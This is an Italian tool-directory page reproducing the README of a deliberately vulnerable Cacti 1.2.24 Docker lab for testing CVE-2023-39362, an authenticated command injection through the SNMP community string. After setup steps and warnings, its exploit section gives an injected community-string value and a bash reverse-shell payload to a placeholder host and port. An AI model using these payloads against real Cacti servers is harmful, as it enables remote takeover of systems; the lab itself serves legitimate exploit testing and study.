Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cacti-rce-snmp-options-vulnerable-application — ATTENZIONE: Questa è un'applicazione vulnerabile per testare l'exploit per l'iniezione di comandi Cacti (CVE-2023-39362). Eseguila a tuo rischio e pericolo! | Kitploit
Strumenti/GitHubGitHub/m3ssap0/cacti-rce-snmp-options-vulnerable-application
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCommand and ControlApprendimento e FormazioneLab e Pratica
GitHubm3ssap0/cacti-rce-snmp-options-vulnerable-application

cacti-rce-snmp-options-vulnerable-application

ATTENZIONE: Questa è un'applicazione vulnerabile per testare l'exploit per l'iniezione di comandi Cacti (CVE-2023-39362). Eseguila a tuo rischio e pericolo!

Vedi RepositorySito web
21 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Cacti v1.2.24 applicazione vulnerabile a iniezione di comandi autenticata (CVE-2023-39362)

Questa è un'applicazione vulnerabile per testare l'exploit per la vulnerabilità Cacti (CVE-2023-39362).

ATTENZIONE!

Questa applicazione contiene gravi vulnerabilità di sicurezza. Eseguila a tuo rischio! Si consiglia di utilizzare un ambiente di backup e protetto (come una VM con uno snapshot recente e rete solo-host). Non caricare questa applicazione su server esposti a Internet, poiché verranno compromessi.

DICHIARAZIONE DI NON RESPONSABILITÀ: non mi assumo la responsabilità del modo in cui chiunque utilizzi questa applicazione. L'unico scopo di questa applicazione è essere uno scenario di test per l'exploit di CVE-2023-39362 e non deve essere usata in modo dannoso. Se il tuo server viene compromesso tramite un'installazione di questa applicazione, non è colpa mia, ma delle persone che l'hanno caricata e installata.

Informazioni sulla vulnerabilità

  • CVE-ID: CVE-2023-39362
  • Link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39362
  • Descrizione: In Cacti 1.2.24, in determinate condizioni, un utente privilegiato autenticato può utilizzare una stringa dannosa nelle opzioni SNMP di un Device, eseguendo un'iniezione di comandi e ottenendo l'esecuzione remota di codice sul server sottostante.

Utilizzo

Ecco i passaggi per configurare l'ambiente:

  1. Esegui docker compose up -d per avviare la composizione.
  2. Puoi completare i passaggi navigando su http://127.0.0.1/cacti per avviare la procedura guidata di inizializzazione di Cacti. Se ricevi un errore relativo al database, attendi un po' e aggiorna la pagina.
  3. Le credenziali predefinite sono admin/admin.
  4. Premi "Next" su tutti i pulsanti durante la procedura guidata, scegliendo le opzioni di conseguenza. Tutte le impostazioni predefinite dovrebbero andare bene e tutti i prerequisiti obbligatori dovrebbero essere soddisfatti.
  5. Dopo l'installazione, accedi come admin.
  6. Vai su "Console" > "Configuration" > "User".
  7. Fai clic sull'utente guest.
  8. "Abilitalo", imposta una password, disabilita "Must Change Password at Next Login" se lo desideri.
  9. Fai clic sul pulsante "Save".
  10. Vai alla sezione "Permissions".
  11. Sotto "General Administration", abilita "Console Access" e "Sites/Devices/Data".
  12. Fai clic sul pulsante "Save".
  13. Esci e riaccedi come guest per provare l'exploit.

Il container si chiamerà vuln-cacti.

L'hostname per un dispositivo SNMP di test è monitored_snmp_device.

Per smontare l'ambiente usa il comando docker compose down.

La guida all'installazione ufficiale di Cacti si trova qui.

Causa principale

Una descrizione dettagliata della causa principale della vulnerabilità è disponibile nell'avviso di sicurezza originale o nel mio post sul blog.

Exploit

(Questa è solo una possibile exploit)

  1. Vai su "Console" > "Create" > "New Device".
  2. Crea un Device che supporti SNMP versione 1 o 2.
  3. Assicurati che il Device abbia Grafici con uno o più modelli di:
    • "Net-SNMP - Combined SCSI Disk Bytes"
    • "Net-SNMP - Combined SCSI Disk I/O"
    • (La creazione del Device dal modello "Net-SNMP Device" soddisferà il prerequisito dei Grafici)
  4. In "SNMP Options", per il campo "SNMP Community String", usa un valore come questo: public\' ; touch /tmp/m3ssap0 ; \'.
  5. Fai clic sul pulsante "Create".
  6. Controlla in /tmp la presenza del file creato.

Per ottenere una reverse shell, si può usare un payload come il seguente.

root@kitploit:~
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'

Autori

  • Antonio Francesco Sardella - segnalatore della vulnerabilità - m3ssap0

Licenza

Questo progetto è concesso in licenza sotto la Unlicense - vedi il file LICENSE per i dettagli.

Scarica lo strumento